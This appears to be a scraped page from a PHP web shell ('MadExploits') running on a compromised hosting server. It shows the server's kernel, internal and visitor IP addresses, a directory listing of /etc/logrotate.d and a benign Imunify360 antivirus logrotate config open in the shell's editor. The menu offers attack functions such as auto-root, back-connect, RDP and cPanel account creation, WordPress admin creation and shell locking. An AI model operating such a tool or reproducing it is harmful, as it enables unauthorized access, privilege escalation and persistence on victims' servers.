Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
apache
195
B
-rw-r-----
bootlog
91
B
-rw-r--r--
chrony
160
B
-rw-r--r--
cloudlinux-backup-utils
226
B
-rw-r--r--
dnf
526
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
ea-php71-php-fpm
265
B
-rw-r--r--
ea-php73-php-fpm
265
B
-rw-r--r--
ea-php74-php-fpm
265
B
-rw-r--r--
ea-php80-php-fpm
265
B
-rw-r--r--
ea-php81-php-fpm
265
B
-rw-r--r--
ea-php82-php-fpm
265
B
-rw-r--r--
ea-php83-php-fpm
265
B
-rw-r--r--
exim
405
B
-rw-r--r--
firewalld
93
B
-rw-r--r--
imunify360
351
B
-rw-r--r--
imunify360-antivirus
1.06
KB
-rw-r--r--
imunify360-pam
175
B
-rw-r--r--
imunify360-php-daemon
364
B
-rw-r--r--
imunify360-unified-access-logg...
241
B
-rw-r--r--
imunify360-webshield
411
B
-rw-r--r--
modsecurity_logs
277
B
-rw-r--r--
mysql
972
B
-rw-r--r--
named
514
B
-rw-r-----
nscd_logs
180
B
-rw-r--r--
ossec-hids
595
B
-rw-r--r--
syslog
224
B
-rw-r--r--
wpa_supplicant
100
B
-rw-r--r--
yum
103
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : imunify360-antivirus
# Logrotate configuration for logs managed by imunify-antivirus package. # This file is installed by the imunify-antivirus package. /var/log/imunify360/aibolit_actions.log /var/log/imunify360/mds_actions.log { # Rotate daily, or sooner if size exceeds 50MB (checked when logrotate runs) daily maxsize 50M # Keep rotated files for 3 days maxage 3 # Add datetime to rotated filename # Note: CentOS 7 logrotate doesn't support %H%M%S, using %s (unix timestamp) for uniqueness # Rotated files will have following names: aibolit_actions.log-20260107-1767805468.gz dateext dateformat -%Y%m%d-%s # Don't error if log file is missing missingok # Don't rotate empty files notifempty # Copy and truncate instead of moving the log file # This allows the service to keep writing without restart copytruncate # Compress rotated files with gzip. # I would prefer to use zst when it is available, # but this requires conditional compression and postrotate # script, what makes config more complex. compress }
Close